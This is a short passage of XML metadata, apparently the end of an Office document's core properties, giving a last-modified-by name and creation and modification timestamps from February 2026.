        <v>10802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LACHQER Wiam</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-19T12:22:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-19T17:07:12Z</dcterms:modified>
</cp:coreProperties>
</file>